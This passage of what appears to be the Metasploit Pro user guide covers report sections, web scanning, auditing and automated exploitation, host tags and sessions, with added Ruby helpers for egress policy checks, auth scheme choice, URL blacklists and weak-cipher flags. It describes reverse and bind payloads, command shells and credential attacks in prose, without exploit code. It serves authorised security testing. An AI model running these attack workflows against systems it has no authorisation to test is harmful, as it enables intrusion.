5. Critical Non-Filtered Ports - Lists all open critical ports that were not filtered by the firewall and provides additional information about each port, such as the port state, the service bound to the port, and the service description. Only the port state and port number are obtained from the firewall egress test; the service name and description are provided by the Internet Assigned Numbers Authority (IANA). If there is no data available, this section is not generated for the report.

6. Registered Non-Filtered Ports - Lists all open registered ports that were not filtered by the firewall and provides additional information about each port, such as the port state, the service bound to the port, and the service description. Only the port state and port number are obtained from the firewall egress test; the service name and description are provided by the Internet Assigned Numbers Authority (IANA). If there is no data available, this section is not generated for the report.


7. Appendix: Resources - Provides additional information about port states, port groups, and services.

8. Appendix: Report Generation Options - Lists the options that were used to generate the report.
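To show how the Port State Distribution and Non-Filtered Ports sections are derived from raw egress results, and how to turn them into the policy check the report is meant to support, here is an added Ruby example written for this guide (it is not Metasploit Pro code). The result data and service names are constructed; the port groups are an assumption that maps "critical" to the IANA well-known range (1-1023) and "registered" to 1024-49151, since the guide does not define the groups.

```ruby
# Added example (not Metasploit Pro code): summarise egress test results the
# way the Firewall Egress Testing Report's sections do, then compare the open
# ports against the egress policy you intended to enforce.

# Constructed results: port => state observed by the egress test.
EGRESS_RESULTS = {
  22 => :open, 25 => :filtered, 53 => :open, 80 => :open, 443 => :open,
  445 => :filtered, 1433 => :filtered, 3389 => :open, 8080 => :open, 8443 => :closed,
}.freeze

# Constructed service names (the real report takes these from IANA).
SERVICE_NAMES = { 22 => 'ssh', 53 => 'domain', 80 => 'http', 443 => 'https',
                  3389 => 'ms-wbt-server', 8080 => 'http-alt' }.freeze

# Assumed port grouping: well-known ports are "critical", IANA registered
# ports are "registered", everything else is dynamic.
def port_group(port)
  case port
  when 1..1023     then :critical
  when 1024..49151 then :registered
  else                  :dynamic
  end
end

# Port State Distribution: counts of open/filtered/closed per group.
def port_state_distribution(results)
  dist = Hash.new { |h, k| h[k] = Hash.new(0) }
  results.each { |port, state| dist[port_group(port)][state] += 1 }
  dist
end

# Non-Filtered Ports sections: open ports in the group, with service info.
def non_filtered_ports(results, group)
  results.select { |port, state| state == :open && port_group(port) == group }
         .keys.sort
         .map { |p| { port: p, state: :open, service: SERVICE_NAMES.fetch(p, 'unknown') } }
end

# Policy check: open ports that your egress policy does not allow.
def egress_policy_violations(results, allowed_ports)
  results.select { |port, state| state == :open && !allowed_ports.include?(port) }
         .keys.sort
end

if __FILE__ == $PROGRAM_NAME
  p port_state_distribution(EGRESS_RESULTS)
  p non_filtered_ports(EGRESS_RESULTS, :critical)
  p egress_policy_violations(EGRESS_RESULTS, [53, 80, 443])
end
```

With an intended policy of "only DNS, HTTP and HTTPS may leave the network", the violation list (22, 3389 and 8080 in the constructed data) is the action item the report's Non-Filtered Ports sections exist to surface.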

Passive Network Discovery Findings Report


The Passive Network Discovery Findings Report presents the data for a Passive Network Discovery MetaModule run. It provides a high-level statistical overview of the hosts and services that the MetaModule was able to stealthily discover. In addition to graphs and tables, the report provides details about the discovered hosts - including detailed information about the active services running on those hosts, such as port numbers, protocols, and port states.

ID. Report Section - Report Description

1. Title Page - The front page of the report. It includes the Rapid7 logo, product name, and a brief description of the report contents.

2. Project Summary - Lists the project name and the user who generated the report.

3. Findings Summary - Lists the packet capture details, such as the total capture time, number of packets captured, and the amount of data captured. The section also summarizes the number of hosts, services, and credentials the MetaModule discovered.

4. Host and Service Distribution - Shows a graphical breakdown of hosts and services that the MetaModule discovered. If no data is available, then the report does not show a graph.

5. Detailed Findings - Lists each host the MetaModule was able to discover and shows any ports it was able to enumerate.

6. Appendix: Report Generation Options - Lists the options that were used to generate the report.


Auth MetaModule Reports


The Auth MetaModule Report presents the findings for a Known Credentials Intrusion, SSH Key Testing, Single Password Testing, or Pass the Hash MetaModule run. It includes tables and graphs that provide a high-level overview of the hosts and services that the MetaModule was able to authenticate to with known credentials. In addition to graphs and tables, the report provides details about the hosts and services that the MetaModule was able to authenticate to, including information about the type of session that was opened, when the session was opened, and when the session was closed.

ID. Report Section - Report Description

1. Title Page - The front page of the report. It includes the Rapid7 logo, product name, and a brief description of the report contents.

2. Project Summary - Lists the project name and the user who generated the report.

3. Findings Summary - Lists the name of the MetaModule that was run, the test runtime, and the user name/password combination used to authenticate to a target range of hosts. If you enabled the Mask discovered passwords option when you configured the report settings, the report displays a masked password. The report also displays the number of hosts that the MetaModule targeted, the number of services that it attempted to log in to, and the number of successful logins it was able to obtain.

4. Authenticated Hosts and Services Summary Charts - Shows a graphical breakdown of hosts and services that the MetaModule was able to authenticate to. If no data is available, the report does not show a graph.

5. Detailed Findings - Lists the services and session details for each host that the MetaModule was able to authenticate to.

6. Appendix: Report Generation Options - Lists the options that were used to generate the report.


Chapter 13: Web Application Tests

To learn more about web application tests, read the following topics:

- Web Scans on page 296
- Web Application Assessment Report on page 305

Web Scans
A web scan is the discovery process that Metasploit Pro uses to spider web pages and applications to search for active content and forms. During a web scan, the web scanner requests links and pages and parses the HTML for data. After a web scan completes, Metasploit Pro shows you the web server used to host each URL, or web application, and the number of pages and forms that were crawled.

When you configure a web scan, you should specify the maximum number of URL and page requests to control the duration of the web scan. By default, the maximum number of requests is set to 500 per web application. However, most web applications require up to 5,000 for complete site coverage. If you need more comprehensive site coverage, you should set the maximum number of requests to a value that satisfies your scan requirements. Just remember that the number of requests affects the time it takes the web scanner to complete.

Additionally, you can set a limit on the amount of time that the scanner spends on each URL. You should set a time limit to reduce the scan time. Depending on the number of URLs that you are scanning, the entire web scan can be lengthy. When performing a web scan, you may need to adjust the web scan configuration multiple times before you achieve the results that you want.

Once the web application has been parsed, Metasploit Pro saves the data to the project. You'll be able to view the information for each web application, or URL, from the main Web Apps page.


Web Application Testing


Web application testing is the process that scans active web content and forms for vulnerabilities, such as remote code execution, cross-site scripting, and SQL injection vulnerabilities, and matches exploits to identified vulnerabilities. In Metasploit Pro, web application testing is a three part process:

1. Scanning - The scan engine crawls and enumerates the web application. This process identifies the URLs and IP addresses that are available for auditing.

2. Auditing - The scan engine identifies vulnerabilities that exist in the targeted web application, web server, and related databases.

3. Exploitation - Metasploit Pro automatically generates an exploit map, or an attack plan, based on the vulnerabilities identified during the audit. Once the attack plan has been created, Metasploit Pro launches the relevant modules against the identified vulnerabilities and attempts to exploit the web application.

Web Scan Options


You can configure the following options for a web scan:

- URLs - Defines a list of URLs that the web crawler uses as a starting point. To specify a custom virtual host, prefix the name to the address and add a comma to separate the name from the address. For example, use intranet,http://192.168.0.1.
- Maximum requests - Defines the maximum number of pages that the web crawler requests for each web page.
- Time limit - Defines the maximum amount of time, in minutes, that the web crawler spends on each web site.
- Concurrent requests - Defines the maximum number of concurrent requests that can be sent per site.
- HTTP user name - Defines the user name that the web crawler uses to authenticate each request.
- HTTP password - Defines the password that the web crawler uses to authenticate each request.
- HTTP cookie data - Sets the seed for the initial cookie for each request.
- HTTP user agent - Defines the user agent that the web crawler sends in each request.

Authenticated Web Scans


Metasploit Pro supports authenticated web application scans with Basic, Digest, Negotiate, and NTLM authentication types. When you supply a user name and password combination, Metasploit Pro uses the appropriate authentication type to automatically authenticate to the remote host. If the server supports multiple authentication types, then Metasploit Pro chooses one based on the following order:

- Basic
- Digest
- Negotiate
- NTLM

To enable automatic authentication, you must define the HTTP username and HTTP password fields under the Advanced Web Crawler Settings on the web application scan configuration page. You can only define one user name and password combination per web scan.
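The selection rule above can be seen in action against the challenges a server actually sends. The following Ruby is an added example written for this guide, not Metasploit Pro's own code: it parses the WWW-Authenticate headers of a constructed 401 response and picks a scheme using the Basic, Digest, Negotiate, NTLM order from the list. The response text and the helper names are assumptions; only the preference order comes from the guide.

```ruby
# Added example (not Metasploit Pro code): choose an HTTP authentication
# scheme from a 401 response using the guide's preference order.

AUTH_PREFERENCE = %w[basic digest negotiate ntlm].freeze

# Parse the header block of a raw HTTP response into [scheme, params]
# pairs, one per WWW-Authenticate header. Scheme names are compared
# case-insensitively, as RFC 7235 requires.
def parse_challenges(raw_response)
  header_block = raw_response.split(/\r?\n\r?\n/, 2).first.to_s
  header_block.each_line.map do |line|
    m = line.match(/\AWWW-Authenticate:\s*(\S+)(?:\s+(.*?))?\s*\z/i)
    m ? [m[1].downcase, m[2].to_s] : nil
  end.compact
end

# Pick the first scheme in AUTH_PREFERENCE that the server offered; nil when
# the server offers nothing the scanner supports (e.g. only Bearer).
def choose_auth_scheme(raw_response)
  offered = parse_challenges(raw_response).map(&:first)
  AUTH_PREFERENCE.find { |scheme| offered.include?(scheme) }
end

# Constructed 401 response offering two schemes (no real host involved).
SAMPLE_401 = [
  'HTTP/1.1 401 Unauthorized',
  'WWW-Authenticate: Negotiate',
  'WWW-Authenticate: Digest realm="intranet", qop="auth", nonce="abc123"',
  'Content-Length: 0',
  '',
  '',
].join("\r\n").freeze

if __FILE__ == $PROGRAM_NAME
  p parse_challenges(SAMPLE_401)
  puts choose_auth_scheme(SAMPLE_401)
end
```

Because Basic is first in the order, a server that offers both Basic and a stronger scheme will be authenticated to with Basic, which sends the credential base64-encoded on every request; scan such hosts over HTTPS, and use a dedicated scanning account rather than a privileged one.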

Creating a URL Blacklist for Web Scans


A URL blacklist defines the URLs in the web application that you do not want to scan or crawl. To create a URL blacklist, you can define URLs or you can use wild card expressions. A URL blacklist can consist of both URLs and wild card expressions. A wild card expression is a regular expression that defines the pattern that the web crawler uses to identify blacklisted URLs. If you define wild card expressions in the blacklist, the crawler performs a match against each URL it finds. If the crawler finds a match, it does not submit a request for the URL. Instead, it reports that it found the URL and moves on to the next one.


For example, if you want to skip all URLs that contain private in the file path, you can specify */private* as the URL pattern. When the crawler encounters a URL, like http://your.domain.com/private, it skips the URL.

To create a URL blacklist for a web scan:


1. From within a project, click the Web Apps tab. The Web Application page appears.

2. Click the Web Scan button. The New Web Application Scan page appears.

3. Find the URL access area.

4. In the URL patterns that shouldn't be accessible to guest web traffic field, use one of the following methods to add URLs:

   - Define URLs - Enter the URLs that you do not want to scan or crawl.
   - Define Wild Card Expressions - Enclose the URL pattern that you want to use between two asterisks (*). Each URL pattern must be on a new line. For example, you can specify */admin* to blacklist any URLs that contain the word admin in the URL path.
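Because a wild card entry is matched as a pattern against every URL the crawler finds, it pays to test a blacklist before the scan runs, especially when the target has pages you must not touch (logout links, destructive admin actions). The following Ruby is an added example written for this guide, not Metasploit Pro's code: it compiles blacklist text in the format described above (plain URLs and `*...*` patterns, one per line) and returns the crawler's decision for a URL. The pattern-to-regex translation and the helper names are assumptions.

```ruby
# Added example (not Metasploit Pro code): compile a URL blacklist of exact
# URLs and */pattern*/ wild card lines and decide, per URL, whether the
# crawler requests it or only records it.

# Compile the text a user would paste into the URL access field.
def compile_blacklist(text)
  text.each_line.map(&:strip).reject(&:empty?).map do |entry|
    if entry.start_with?('*') && entry.end_with?('*') && entry.length > 1
      # Escape everything, then turn any inner '*' back into '.*'.
      inner = Regexp.escape(entry[1..-2]).gsub('\*', '.*')
      { type: :pattern, source: entry, re: Regexp.new(inner, Regexp::IGNORECASE) }
    else
      { type: :url, source: entry, value: entry.downcase }
    end
  end
end

# Return the matching entry, or nil when the URL is not blacklisted.
def blacklisted?(url, blacklist)
  blacklist.find do |entry|
    entry[:type] == :url ? url.downcase == entry[:value] : url.match?(entry[:re])
  end
end

# Crawler decision: a hit is reported but never requested, as the guide says.
def crawl_decision(url, blacklist)
  hit = blacklisted?(url, blacklist)
  if hit
    { url: url, action: :report_only, matched: hit[:source] }
  else
    { url: url, action: :request }
  end
end

# Constructed blacklist input (the hostname is the guide's placeholder).
BLACKLIST_TEXT = <<~TEXT
  */private*
  */admin*
  http://your.domain.com/logout
TEXT

if __FILE__ == $PROGRAM_NAME
  bl = compile_blacklist(BLACKLIST_TEXT)
  %w[http://your.domain.com/private/report http://your.domain.com/administrator
     http://your.domain.com/logout http://your.domain.com/index.html].each do |u|
    p crawl_decision(u, bl)
  end
end
```

Note that `*/admin*` also matches `/administrator`, since a wild card pattern is a substring match; if that is not what you want, make the pattern more specific (for example `*/admin/*`).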

Enabling Secure Socket Layer Checks for Web Scans


To run a web scan with automatic Secure Socket Layer (SSL) checks, you need to enable the Report if SSL is not enabled and Report if weak SSL ciphers are allowed options. These options are both available under the Transport Layer Security settings on the web application scan configuration page.

When these SSL options are enabled, the web scanner reports a vulnerability when a web server is not running over SSL. If the web server is running SSL, the web scanner checks for weak cryptographic ciphers. If weak ciphers are allowed, the web scanner reports a vulnerability against the web server.
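The two checks described above reduce to a scheme test and a cipher-suite test. The following Ruby is an added example written for this guide, not Metasploit Pro's scanner: it applies both checks to constructed targets and the suites each one is assumed to offer, without opening a network connection. The weakness markers (NULL, EXPORT, RC4, DES, MD5 and anonymous key exchange) are common industry heuristics and are an assumption, not the guide's definition of a weak cipher.

```ruby
# Added example (not Metasploit Pro code): flag plain-HTTP sites and weak
# TLS cipher suites the way the two SSL scan options report them.
require 'uri'

# Suite-name tokens that mark a suite as weak (OpenSSL naming, assumed).
WEAK_CIPHER_MARKERS = %w[NULL EXPORT RC4 DES MD5 ADH AECDH ANON].freeze

# A suite is weak when any hyphen-separated token is a weakness marker
# (DES-CBC3-SHA is caught through its DES token).
def weak_cipher?(suite)
  suite.upcase.split('-').any? { |t| WEAK_CIPHER_MARKERS.include?(t) }
end

# Produce the findings for one target: "SSL not enabled" for non-HTTPS URLs,
# otherwise "weak SSL ciphers allowed" listing the offending suites.
def ssl_findings(url, offered_suites)
  uri = URI.parse(url)
  return [{ url: url, finding: 'SSL not enabled' }] unless uri.scheme == 'https'

  weak = offered_suites.select { |s| weak_cipher?(s) }
  weak.empty? ? [] : [{ url: url, finding: 'weak SSL ciphers allowed', ciphers: weak }]
end

# Constructed targets and the suites each is assumed to offer.
SAMPLE_TARGETS = {
  'http://intranet.example.test/' => [],
  'https://shop.example.test/'    => %w[ECDHE-RSA-AES128-GCM-SHA256 RC4-SHA DES-CBC3-SHA],
  'https://secure.example.test/'  => %w[ECDHE-RSA-AES256-GCM-SHA384 ECDHE-RSA-CHACHA20-POLY1305],
}.freeze

def scan_all(targets = SAMPLE_TARGETS)
  targets.flat_map { |url, suites| ssl_findings(url, suites) }
end

if __FILE__ == $PROGRAM_NAME
  scan_all.each { |f| p f }
end
```

In a real assessment the offered suites come from the server's handshake rather than a table; the classification step is the same, and the remediation is the same too: disable the flagged suites in the server's TLS configuration and re-run the scan to confirm the finding clears.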

Running a Web Scan


1. From within a project, click the Web Apps tab.

2. When the Web Applications page appears, click the Web Scan button.

3. When the New Web Application Scan page appears, enter the URLs that you want the web crawler to crawl in the URLs field. Note: If you need to enter an IPv6 address, you must enclose the address in square brackets. For example, use http://[fde2:b7c5:94b2:ffaa:20c:29ff:fe6c:ebdb].


4. Configure the web app scan options. Basically, you need to set a limit on the number of pages and links that the web scanner requests and the maximum amount of time that the web scanner spends on each web application. This number may need to be adjusted in subsequent scans in order to obtain the level of site coverage that you desire. Most web applications may need up to 5,000 requests.

5. Additionally, you can supply credentials that the web scanner uses to authenticate each request.

6. When you are ready to run the web app scan, click the Launch button.


Web Audit
A web audit is the process that identifies vulnerabilities that exist in the web application. The web scanner parses the information that was collected for the web application and uses that information to cross-reference vulnerability information. A web audit can discover the following classes of issues: XSS, SQL Injection, and LFI/RFI. If a vulnerability is identified for a web application, Metasploit Pro provides the following information for the affected website:

- Host IP
- Web application URL
- Vulnerability category
- Vulnerability name
- Vulnerability rank
- Vulnerability description
- Vulnerability method
- Vulnerability parameter
- Vulnerable form data
- Vulnerability proof

Web Audit Options


You can configure the following options for a web audit:

- Maximum request/form - Determines the maximum number of requests that the web audit sends for each form.
- Time limit/form - Determines the maximum amount of time, in minutes, that the web audit spends on each form.
- Instance limit/form - Determines the maximum number of unique form instances that the web audit tests.
- HTTP user name - Defines the user name that the web audit uses for authentication for each request.
- HTTP password - Defines the password that the web audit uses for authentication for each request.
- HTTP cookie data - Sets the seed for the initial cookie for each request.
- HTTP user agent - Defines the user agent that the web audit sends in each request.


Running a Web Audit


Before you can run a web audit, you must have already run a web scan for the project. The project must contain a list of enumerated web applications and any

1. From within a project, click the Web Apps tab.

2. When the Web Applications window appears, click the Audit Web Apps button.

3. When the New Web Application Audit window opens, configure the web application audit settings. At a minimum, you should set the maximum number of requests/forms that the web crawler sends to each web application form and define the time limit that the audit should spend on each form.

4. Additionally, if you have credentials that you want the web scanner to use to authenticate the request, you can specify them in the HTTP user name and HTTP password fields.

5. To choose the URLs that the web scanner audits, you can click on the Show Advanced Options button. A list of all web applications available for auditing will display. By default, all the web applications will be selected. You can deselect any web applications that you do not want to include in the audit.

6. Launch the web audit.


Web Application Exploit


After you perform a web scan and a web audit, you are ready to exploit the web application. When you exploit a web application, Metasploit Pro automatically builds an attack plan based on the vulnerability information that was identified for the web application. The attack plan maps each vulnerability to a matching exploit and builds a queue of modules that Metasploit Pro intends to run against the web application. Configuring exploits for a web application is similar to configuring an automated exploit. You need to define the timeout value, payload type, connection type, and listener ports for the exploit. Additionally, if you have credentials that you want to use to authenticate each request, you can provide that information in the HTTP username and HTTP password fields.

Web Application Exploit Options


You can configure the following options for web application exploits:

- Timeout in Minutes - Defines the maximum amount of time, in minutes, that the system allocates to each exploit.
- Connection Type - Defines the payload type for each exploit. Payloads include:
  - Reverse - Initiates a connection from the target system to the attacker.
  - Bind - Forces the target to open a listening port on the target system.
  - Auto - Selects the best method for the attacker to create a connection to the target system.

Running Exploits Against a Web Application


1. From within a project, click the Web Apps tab.

2. When the Web Application window appears, click the Exploit Web Apps button.

3. When the Exploit Web Applications window appears, enter the maximum amount of time you want Metasploit Pro to spend on each exploit in the Timeout field. Enter the time in minutes.

4. In the Obtain one session per target and Skip targets with sessions fields, enter true if you want Metasploit Pro to bypass a target with an open session. Enter false if you want Metasploit Pro to attempt to obtain more than one session per target.

5. From the Payload type dropdown, choose the payload type for the exploits. You can choose between Meterpreter and command shell.

6. From the Connection type dropdown, choose the connection type that you want the exploits to use.


7. In the Listener Ports field, specify the range of ports that should be used for reverse connect back payloads.

8. If you have credentials that you want to use to authenticate your HTTP requests, you can provide them in the HTTP username and HTTP password fields under the Web Application Identification Settings area.

9. From the Target Web Vulnerabilities area, select the vulnerabilities that you want to exploit. By default, all known vulnerabilities are selected for you.

10. When you are done configuring the exploitation settings, launch the attack.


Web Application Assessment Report


The Web Application Assessment Report is a comprehensive document that details the findings of a web application test. It contains graphical summaries that help you quickly understand the scope of the test and the data that the web scanner collected. The purpose of the report is to help you identify vulnerabilities in web applications and see how they correlate to OWASP application risk categories. For each identified vulnerability, the report shows the site information and the data used as proof text for the vulnerability. Remediation advice is provided in the appendix for Local File Inclusion (LFI), Remote File Inclusion (RFI), Cross-Site Scripting (XSS), SQL Injection (SQLi), and Publicly Writable Directory (PWD) vulnerabilities.

Web Application Assessment Report Sections


The Web Application Assessment Report includes the following sections:

- Engagement Scope
- OWASP Top 10 Web Application Security Risk Summary
- Summary Graphs
- Vulnerability Details
- Remediation Advice
- Glossary
- Report Options

Web Application Assessment Report Engagement Scope


Provides a statistical overview of the web application test findings.


Web Application Assessment Report Summary Graphs


Provides a graphical breakdown of the vulnerabilities that were identified and categorizes the findings based on operating system and OWASP category.


OWASP Top 10 Web Application Security Risk Summary


Provides an overview of the failures that were detected in OWASP 2013 categories.

Web Application Assessment Report Vulnerability Details


Identifies the vulnerability, provides the site information, and shows the data that was used to find the vulnerability.


Web Application Assessment Report Remediation


Provides information on how to reduce the risk and impact of web application vulnerabilities.


Web Application Assessment Report Glossary


Provides definitions for some of the most commonly used terms in the Web Application Assessment Report.


Web Application Assessment Report Options


Lists the options that were used to generate the report.


Web Application Assessment Report Options


When you generate the Web Application Assessment Report, there are several options that you can configure to customize the report. The following sections describe some of the options that you may want to utilize when you generate the report:

- Including and Excluding Report Sections
- E-mailing the Web Application Assessment Report
- Naming the Web Application Assessment Report
- Ordering the Vulnerabilities in the Web Application Assessment Report

Naming the Report


Metasploit Pro uses the report type and task ID to name the report. For example, the default name for the Web Application Assessment Report is Webapp_assessment-TaskID. To change the name, you need to replace the default name in the Report Name field on the New Report form.

Including and Excluding Report Sections


By default, the Web Application Assessment Report includes all sections that are available for the report type. To include or exclude sections from your report, find the Report Sections area on the New Report form. You will see a list of all the sections that are available in the report, such as the Executive Summary, Engagement Scope, OWASP Status, Summary Graphs, and Vulnerability Details sections, as well as appendices for the report. Any sections that have a marked check box will automatically be included in the report. To remove any sections, deselect the check box.

Ordering Vulnerabilities By
By default, if Metasploit Pro identifies vulnerabilities during a web application test, it will list the vulnerabilities by category in the Web Application Assessment Report. You can change the information that Metasploit Pro uses to sort the vulnerabilities. Reports can be sorted by the following information:

- Category
- Host
- OWASP
- Path
- Risk
- VHOST

E-mailing the Generated Report


Metasploit Pro enables you to automatically e-mail a report after it is generated. To e-mail a report, you need to enable the E-mail report option on the New Report form and specify the emails that you want to send the report to. The e-mails that you specify must be comma separated. Additionally, before you can e-mail a report, you need to set up the SMTP settings through the Global Settings. If you do not have a global SMTP server set up, go to Administration > Global Settings > SMTP Settings. You will need to provide Metasploit Pro with the information for your mail server. This information includes the credentials that Metasploit Pro will need to authenticate to the mail server and the domain and SMTP port information for the mail server.

Generating a Web Application Assessment Report


1. From within a project, choose Reports > New Standard Report.

2. When the New Report form appears, click the Report type dropdown and choose Web Application Assessment.


3. From the Web Application Assessment Report Format options, choose the format you want to use to generate the report. The most commonly used format is PDF.

4. In the Report Name field, enter the name that you want to assign to the report. This is the name that displays on the Reports page in Metasploit Pro and the name that the system uses to save the report. You can choose to use the default naming convention, which uses the report type as the report name and appends the task number to it.

5. From the Report Sections options, deselect any report sections that you do not want to include in the report. By default, all sections are included.

6. Click the Order vulnerabilities by dropdown and select the value you want to use to sort the vulnerabilities.


7. If there are any hosts that you want to explicitly include in or exclude from the report, use the Included addresses and Excluded addresses fields to specify the addresses of those hosts.

8. If you want to e-mail the generated report, you can select the E-mail report option and enter a comma separated list of the e-mail addresses that you want to send the report to. Note: If you choose to e-mail the report, please make sure that you have the SMTP settings configured through the Global Settings.


9. Click the Generate button to create the report. The Task Log appears and shows you the progress of the report generation.

10. When the report generation is complete, select Reports > Show Reports to view a list of reports stored in the project.

11. Find the report you just generated. You can either view the report directly through your browser or download the report and save it to a location on your system.

Viewing Web Vulnerability Details


Metasploit Pro provides the following details for found web vulnerabilities:
- Application URL - The URL where the vulnerability was found.
- Vulnerable Host - The fully qualified domain name of the vulnerable web application.
- Vulnerability Category - The Metasploit web vulnerability category to which the vulnerability belongs. Metasploit web vulnerability categories include Publicly-Writable-Directory, XSS, LFI, RFI, SQLi, and Version.
- Vulnerability Name - The name of the identified vulnerability.
- Vulnerability Risk - Identifies the likelihood of the vulnerability being exploited and measures the impact that exploitation will have. The vulnerability risk can be low, medium, or high.
- Vulnerability Confidence - The level of certainty that the vulnerability exists. If the exploit was able to force the page to include a remote file, the confidence level will be 100%. If it was only able to invoke an error, the confidence level will be 75%.
- Vulnerability Description - Provides a description of the vulnerability.
- Vulnerable Method - The HTTP request method used.
- Vulnerable Parameter - The parameter in the request that can be used to manipulate data.
- Proof - Provides the data that was used to prove the existence of the vulnerability.

To view the details for a vulnerability:


1. From within a project, click on the Web Apps tab.

2. Find the Website column and locate the site that contains the vulnerability that you want to view.

3. Click on the site link to open the Vulns page. The Vulns page shows the details for the site.

Web Vulnerability Categories


Metasploit Pro categorizes applications and vulnerabilities into the following categories:


- Version - TikiWiki, awstats, basilic, cacti, coppermine, joomla, mybb, oscommerce, php-xml-rpc, tikiwiki1.9.8, tikiwiki8.3, wordpress, xss
- CMDi - cmd, eval
- Publicly Writable Directory - http_put
- LFI - LFI
- RFI - RFI
- SQLi - sqli_blind_mysql, sqli_blind_postgres, sqli_blind, sqli
- XSS - XSS

Vulnerability Proof Text


Vulnerability proof is text that provides evidence of the existence of a vulnerability. You can view the proof text for each vulnerability in the Web Application Assessment Report or from a website's Vulns page. The type of proof text depends on the module that logged the vulnerability. The following vulnerability categories and text proof are available:
- Command Injection - Executes the id command on a *nix system and looks at the output in the HTTP response. Uses the output as proof text.
- Direct Object Reference - Uses the URL of insecurely exposed resources as proof text.
- Local File Inclusion - Attempts to include a file from the server's file system and searches for the contents of that file. If the content is found, it is used as proof text.
- PHP Code Evaluation - Uses PHP code to add two random numbers and searches for the result in the response. If the result is found, it is used as proof text, in addition to some parts of the HTTP response.
- Remote File Inclusion - Attempts to add a remote file to the server's file system and searches for the contents of that file. If the content is found, it is used as proof text.
- SQL Injection - Shows an excerpt of the error message as proof text.
- SQL Injection (blind variant using differential analysis) - Displays "Boolean manipulation" because there is no proof text to display.
- Unvalidated Redirect - Displays the response headers as proof text.
- XSS - Shows an excerpt of the HTML code that contains the injected element as proof text.
- CSRF - Shows the HTML for the vulnerable form as proof text. The HTML may not match the original HTML because it is sanitized before it is parsed.
- Publicly Writable Directory - Uploads a file that contains a random string. If the file upload is successful, the random string is used as proof text.
- Unauthorized Access - Displays the URL of the insecurely exposed path as proof text.


Chapter 15:

Host Tags

To learn more about host tags, read the following topics:


- About Host Tags on page 320
- Components of a Host Tag on page 320
- Host Tag Tasks on page 322

About Host Tags


A host tag is an identifier that lets you easily search for hosts, organize assets, create work queues, and track findings for automatic inclusion in reports. For example, if you import scan data from multiple sources, such as Nexpose and Qualys, you may need a way to easily identify the hosts that are from Nexpose and the hosts that are from Qualys. As you import the Nexpose data, you can set the option to automatically apply a host tag, like nexpose_host, to every host. The same goes for the Qualys hosts, except you would use a host tag like qualys_host.

There are a couple of ways to create a tag. With the first method, you create the host tag, search through existing hosts, and manually apply the host tags. The second method, mentioned earlier, is automatic tagging. You can only use automatic tagging for new data imports or discovery scans. There is an option that you can select that enables Metasploit Pro to automatically tag hosts as it imports or discovers them.

There is no limit on the number of host tags that you can apply to a host. Therefore, you can apply as many host tags as you need to create the types of search queries that you need. After you tag the hosts, you can search for a specific host tag, which will return a list of hosts that match the search criteria. In this example, if you search for nexpose_host, you will see a list of the Nexpose hosts that you imported. This is useful if you know that you want to run an exploit against a certain type of host and do not want to spend the time sorting through hosts and manually selecting them from the Hosts page.

Components of a Host Tag


A host tag consists of a word or phrase that contains no spaces, a description, and three attributes.

Host Tag ID
The host tag ID, or simply host tag, consists of a single word or phrase with no spaces. Use a special character, like the underscore, to separate words. For example, you cannot use nexpose hosts, but you can use nexpose_hosts.

Description
The description describes the purpose of the host tag. For example, if you use host tags to identify different subnets, you can add a description to help you understand the purpose of the subnet. An example of a description is: Tags any hosts that are part of the IT team's subnet.


Host Tag Attributes


You can assign attributes to indicate whether or not the tagged hosts should display in the generated report. Use the following attributes to determine how reports handle hosts that are tagged with the host tag:
- Include in summary report - Provides information about the host in the Executive Summary section of the report.
- Include in report details - Provides information about the host in the Detailed Findings section of the report.
- Critical finding - Marks the host information as critical.


Host Tag Tasks


You can perform the following tasks with host tags:

- Creating a Host Tag
- Deleting a Host Tag
- Applying a Host Tag
- Automatically Tagging Hosts

Creating a Host Tag


1. Click the Analysis tab.

2. Click the host IP address.

3. Click the Tags tab.

4. In the Name field, enter a name for the tag.


5. In the Description field, enter a description for the tag.

6. Enable any of the following options: Include in report summary, Include in report details, and Critical Finding.

7. Click the Save button.

Deleting a Host Tag


1. From within a project, click the Analysis tab.

2. When the Host window appears, click the host IP address to open the host details window.

3. Click the Tags tab.


4. Locate the tag you want to delete and click Remove.

5. When the confirmation window appears, click OK to delete the host tag.

6. Save the tag.

Applying a Host Tag


1. From within a project, click the Analysis tab.

2. Select the host you want to tag.

3. Click the Tag button.

4. Search for the tag you want to use. If you need to create a tag, you can enter the tag name in the search field, and Metasploit Pro will automatically create and apply the tag.

5. Click the Tag button.


Updating a Host Tag


1. From within a project, click the Analysis tab.

2. When the Host window appears, click on the host IP address to open the host details window.

3. Click the Tags tab.

4. Under the Update Tags area, locate the tag you want to edit.

5. Edit the description and any of the tag attributes.

6. Save the tag.


Automatically Tagging Discovered Hosts


1. From within a project, click the Analysis tab.

2. When the Host window appears, click the Scan button.

3. When the Discovery Scan window appears, click the Advanced Options button.

4. Select the tags that you want to enable for automatic tagging.

5. Launch the scan.

Automatically Tagging Imported Hosts


1. From within a project, click the Analysis tab.

2. When the Host window appears, click the Import button.

3. When the Import window appears, click Browse to find and select the XML or ZIP file that you want to import into Metasploit Pro.

4. Under the Automatic Tagging area, find the tags that you want to enable for automatic tagging.


5. Click the Import Data button.

Searching for Hosts by Host Tag


To search for hosts by tag, prefix the tag name with the hash symbol (#). For example, if you search for #nexpose_import, Metasploit Pro returns all hosts that have been tagged with the nexpose_import tag.


Chapter 16:

Sessions

To learn more about sessions, read the following topics:


- About Sessions on page 329
- Active Sessions on page 330
- Session Tasks on page 332

About Sessions
An active session provides a connection between the target system and the attacker. Metasploit Pro opens an active session if it can gain access to the host and run a successful attack. After you obtain an active session, you can use it to take control of the target system.


Active Sessions
Metasploit Pro opens an active session on a target system if an exploit or bruteforce attack is successful. An active session enables you to interact with and run tasks against the compromised host. A session can be a Meterpreter session or a command shell session. The type of session that Metasploit Pro opens depends on the type of attack that was used to obtain the session and on the environment in which the session runs. To determine the session type, open the Sessions window and view the Type column, which lists the type of each session. An active session enables you to take control of the session to perform tasks within the target system.

Command Shell Session


A command shell session runs a collection of scripts and provides a shell that you can use to run arbitrary commands against the host. Metasploit Pro opens a command shell session when the following events occur:
- Successful exploit on *nix
- SSH bruteforce on *nix
- Telnet bruteforce on *nix
- Tomcat bruteforce on *nix

Interacting with Command Shell Sessions


The command shell functions as a terminal emulator. You can use the command shell to run any noninteractive process on the target host. Note: You must have open sessions in order to use the command shell.

1. From within a project, click the Sessions tab.

2. When the Sessions window appears, click on the active session that you want to open. The session must be a shell session.

3. Click Command Shell from the Available Actions area. A simulated command shell opens in a new tab in the browser window.


Meterpreter Sessions
